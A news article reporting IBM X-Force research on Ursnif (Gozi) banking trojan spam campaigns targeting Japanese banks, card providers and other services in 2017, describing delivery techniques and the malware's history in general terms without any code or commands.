What is Ursnif? Hackers ramp up banking trojan campaigns in Japan with new targets and techniques

Attackers behind the malicious Ursnif banking trojan have been stepping up spam campaigns in Japan to deliver malware, security researchers have discovered. According to IBM's X-Force team, hackers have been leveraging Ursnif, also known as Gozi, against North Korea, Europe, Australia and Japan for years.

However, recent analysis of the malware revealed that the threat attackers have amplified attacks against Japanese banks and payment card providers since September.

"Ursnif (aka Gozi) banking Trojan was the most active malware code in the financial sector in 2016 and has maintained its dominance through 2017 to date," Limor Kessem, executive security advisor for IBM, wrote in a blog post Thursday (26 October). "But one of its most popular targets in 2017 has been Japanese banks, where Ursnif's operators were very active in late Q3 2017, starting in September.

"In terms of targets, Ursnif malware configurations can be a mixed bag at times, but those targeting Japan are specific to banks and payment card providers in the country. That list of targets remained unchanged through the different campaigns, suggesting that the same actors are likely behind it."

However, recent samples of the malware indicate that the threat actors have expanded the campaign to "target user credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites."

The hackers have adopted various techniques to target Japanese users, including data grabbing from secure sessions, web-injection attacks and page redirections, researchers said.

To deliver the malicious Ursnif payload in Japan, hackers use fake attachments claiming to be from Japanese financial services and payment card providers.

"In other malspam versions, users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif," Kessem wrote. "The payload appears to be served from web resources the attackers registered to serve the malicious code, not from hijacked domains.

"Recent Ursnif malspam campaigns used a macro evasion technique that launches PowerShell only after the user closes the malicious file. This method helps the malware evade sandbox detection."

Researchers observed that the campaign email spikes usually take place in "cyclical weekly rounds" that usually peak on Tuesday evenings while attempted infections usually spike on Thursdays and Fridays.

In other regions such as the UK, the attacks have used the RIG exploit kit to infect users through malvertising campaigns.

First discovered in 2007, Ursnif was operated by an exclusive group of hackers for online banking wire fraud in English-speaking countries. In 2010, however, the source code for the malware was accidentally leaked and repurposed by other hackers to create other trojans such as Vawtrak and Neverquest.

Besides North America, Australia and Japan, Ursnif has been targeting banks in Spain, Poland, Bulgaria and the Czech Republic in 2017. Over the past five years, Ursnif has been one of the most active banking trojans in Japan.

"The history of organized cybercrime in Japan is not very long," Kessem explained. "In most cases of malware migration, cybercriminal groups with adequate resources are looking for easier money, less security and an element of surprise for users who are less accustomed to their spam ploys and social engineering during the banking session."

"So why have other organized groups such as Dridex and TrickBot, both of which target banks in as many as 40 countries, largely stayed away from Japan? The answer could lie in the connections other gangs have with local cybercrime and money-laundering groups. Even on the internet, gangs often stick to their own turf."